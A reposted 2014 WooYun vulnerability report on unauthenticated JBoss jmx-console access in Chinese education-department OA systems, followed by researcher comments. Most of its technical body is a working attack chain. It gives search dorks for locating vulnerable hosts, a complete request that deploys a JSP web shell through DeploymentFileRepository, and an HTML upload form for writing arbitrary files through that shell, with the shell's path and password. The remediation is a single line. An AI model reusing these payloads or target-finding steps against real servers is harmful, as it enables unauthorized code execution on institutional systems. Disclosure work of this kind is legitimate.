教育部门OA系统未授权访问导致文件上传任意代码执行

admin

142105
文章

117
评论

2015年6月9日03:46:45评论719 views字数 254阅读0分50秒阅读模式

摘要

2014-09-05：细节已通知厂商并且等待厂商处理中
2014-09-05：厂商已查看当前漏洞内容,细节仅向厂商公开
2014-09-10：厂商已经主动忽略漏洞，细节向公众公开

漏洞概要关注数(18) 关注此漏洞

缺陷编号： WooYun-2014-75050

漏洞标题：教育部门OA系统未授权访问导致文件上传任意代码执行

漏洞作者： YY-2012

提交时间： 2014-09-05 00:00

公开时间： 2014-09-10 00:02

漏洞类型：未授权访问/权限绕过

危害等级：高

自评Rank： 20

漏洞状态：已交由第三方合作机构(CCERT教育网应急响应组)处理

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签：未授权访问认证设计不合理

4人收藏

漏洞详情

披露状态：

简要描述：

教育部门OA系统未授权访问导致文件上传任意代码执行（主动+被动扫描发现31个）

详细说明：

code 区域

通过谷歌等搜索引擎搜索intitle:教育电子政务平台 或者inurl:edoas2/oa.jsp
 或通过全网地址扫描“/jmx-console/”

code 区域

**.**.**.**/jmx-console/
 http://**.**.**.**/jmx-console/
 **.**.**.**/jmx-console/
 **.**.**.**/jmx-console/
 http://**.**.**.**:8000/jmx-console/
 **.**.**.**:8000/jmx-console/
 **.**.**.**:88/jmx-console/
 **.**.**.**/jmx-console/
 http://**.**.**.**:8088/jmx-console/
 http://**.**.**.**/jmx-console/
 http://**.**.**.**:8080/jmx-console/
 http://**.**.**.**/jmx-console/
 **.**.**.**/jmx-console/
 **.**.**.**/jmx-console/
 http://**.**.**.**/jmx-console/
 **.**.**.**/jmx-console/
 **.**.**.**/jmx-console/
 **.**.**.**/jmx-console/
 **.**.**.**/jmx-console/
 **.**.**.**/jmx-console/
 **.**.**.**/jmx-console/
 **.**.**.**/jmx-console/
 http://**.**.**.**:81/jmx-console/
 **.**.**.**/jmx-console/
 **.**.**.**/jmx-console/
 **.**.**.**/jmx-console/
 http://**.**.**.**/jmx-console/
 **.**.**.**/jmx-console/
 **.**.**.**/jmx-console/
 **.**.**.**/jmx-console/
 **.**.**.**/jmx-console/

以**.**.**.**为案例对象：

code 区域

**.**.**.**/jmx-console/HtmlAdaptor?action=invokeOpByName&name=jboss.admin%3Aservice%3DDeploymentFileRepository&methodName=store&argType=java.lang.String&arg0=upload5warn.war&argType=java.lang.String&&arg1=shell&argType=java.lang.String&arg2=.jsp&argType=java.lang.String&arg3=%3c%25+if(request.getParameter(%22f%22)!%3dnull)(new+**.**.**.**.FileOutputStream(application.getRealPath(%22%2f%22)%2brequest.getParameter(%22f%22))).write(request.getParameter(%22t%22).getBytes())%3b+%25%3e&argType=boolean&arg4=True

以上访问会生成一个这样的路径文件“/upload5warn/shell.jsp”

再通过以下html可进行文件上传：

code 区域

<html>
 <head>
 <meta http-equiv="content-type" content="text/html;charset=utf-8">
 <title>jsp-test</title>
 </head>
 <style>
 .main{width:980px;height:600px;margin:0 auto;}
 .url{width:300px;}
 .fn{width:60px;}
 .content{width:80%;height:60%;}
 </style>
 <script>
   function upload(){
     var url = document.getElementById('url').value,
       content = document.getElementById('content').value,
       fileName = document.getElementById('fn').value,
       form = document.getElementById('fm');
     if(url.length == 0){
       alert("Url not allowd empty!");
       return ;
     }
     if(content.length == 0){
       alert("Content not allowd empty!");
       return ;
     }
     if(fileName.length == 0){
       alert("FileName not allowd empty!");
       return ;
     }
     form.action = url;
     form.submit();
   }
 </script>
 <body>
 <div class="main">
   <form id="fm" method="post">  
     URL:<input type="text" value="http://url/upload5warn/shell.jsp" class="url" id="url" />  
     FileName:<input type="text" name="f" value="css.jsp" class="fn" id="fn" />  
     <a href="javascript:upload();">Upload</a><br/>
     <textarea id="content" class="content" name="t" ></textarea>
   </form>
 </div>
 </body>
 </html>

code 区域

**.**.**.**/upload5warn/css.jsp
 
 密码为：1

漏洞证明：

修复方案：

jboss设置授权访问

版权声明：转载请注明来源 YY-2012@乌云

漏洞回应

厂商回应：

危害等级：无影响厂商忽略

忽略时间：2014-09-10 00:02

厂商回复：

漏洞Rank：10 (WooYun评价)

漏洞评价：

对本漏洞信息进行评价，以更好的反馈信息的价值，包括信息客观性，内容是否完整以及是否具备学习价值

漏洞评价(少于3人评价):

登陆后才能进行评分

50%

评价

2014-09-05 00:38 | 魇 ( 普通白帽子 | Rank:1218 漏洞数:107 | 传闻中魇是一个惊世奇男子，但是除了他华...)

1

转给CCERT教育网应急响应组处理可能会杯具

1# 回复此人
2014-09-05 08:30 | 鬼魅羊羔 ( 普通白帽子 | Rank:299 漏洞数:42 | (#‵′)凸(#‵′)凸(#‵′)凸(#‵′)凸(#‵...)

0

@YY-2012 啥OA？？

2# 回复此人
2014-09-05 10:47 | pandas ( 普通白帽子 | Rank:730 漏洞数:84 | 国家特级保护动物)

0

默默关注

3# 回复此人
2014-09-10 00:18 | U神 ( 核心白帽子 | Rank:1375 漏洞数:152 | 乌云核心菜鸟，此号处于联盟托管中....)

0

我感觉这个和“/bug.php?action=view&id=7077”、“ WooYun: 育软电子政务平台未授权访问（Windows平台安全经典案例） ”是一样的。Jboss漏洞

4# 回复此人
2014-09-10 00:18 | YY-2012 ( 核心白帽子 | Rank:3861 漏洞数:736 | 意淫，是《红楼梦》原创的词汇，但后来演变...)

0

@CCERT教育网应急响应组 @xsser @Finger @疯狗 @浩天教育网应急响应组忽略的补rank吗

5# 回复此人
2014-09-10 00:21 | YY-2012 ( 核心白帽子 | Rank:3861 漏洞数:736 | 意淫，是《红楼梦》原创的词汇，但后来演变...)

0

@U神我不是投通用，我早知道一样的我。我投的是集合

6# 回复此人
2014-09-10 00:22 | U神 ( 核心白帽子 | Rank:1375 漏洞数:152 | 乌云核心菜鸟，此号处于联盟托管中....)

0

@YY-2012 rank肯定是会补的，WooYun评价：15Rank

7# 回复此人
2014-09-10 08:20 | 贫道来自河北 ( 普通白帽子 | Rank:1469 漏洞数:439 | 一个立志要把乌云集市变成零食店的男人)

0

己公开

8# 回复此人
2014-09-10 09:14 | 一只猿 ( 普通白帽子 | Rank:560 漏洞数:98 | 硬件与无线通信研究方向)

0

http://wooyun.org/bugs/wooyun-2013-033468也集合一下

9# 回复此人
2014-09-10 10:29 | YY-2012 ( 核心白帽子 | Rank:3861 漏洞数:736 | 意淫，是《红楼梦》原创的词汇，但后来演变...)

0

@一只猿和我的没重复啊。倒逼

10# 回复此人

漏洞概要 关注数(18) 关注此漏洞

缺陷编号： WooYun-2014-75050

漏洞标题： 教育部门OA系统未授权访问导致文件上传任意代码执行

相关厂商： 上海育盟信息技术有限公司

漏洞作者： YY-2012

提交时间： 2014-09-05 00:00

公开时间： 2014-09-10 00:02

漏洞类型： 未授权访问/权限绕过

危害等级： 高

自评Rank： 20

漏洞状态： 已交由第三方合作机构(CCERT教育网应急响应组)处理

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签： 未授权访问 认证设计不合理

4人收藏

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 YY-2012@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

漏洞评价(少于3人评价): 登陆后才能进行评分

评价

发表评论

在线咨询

微信

漏洞概要关注数(18) 关注此漏洞

漏洞标题：教育部门OA系统未授权访问导致文件上传任意代码执行

相关厂商：上海育盟信息技术有限公司

漏洞类型：未授权访问/权限绕过

危害等级：高

漏洞状态：已交由第三方合作机构(CCERT教育网应急响应组)处理

Tags标签：未授权访问认证设计不合理

漏洞评价(少于3人评价):

登陆后才能进行评分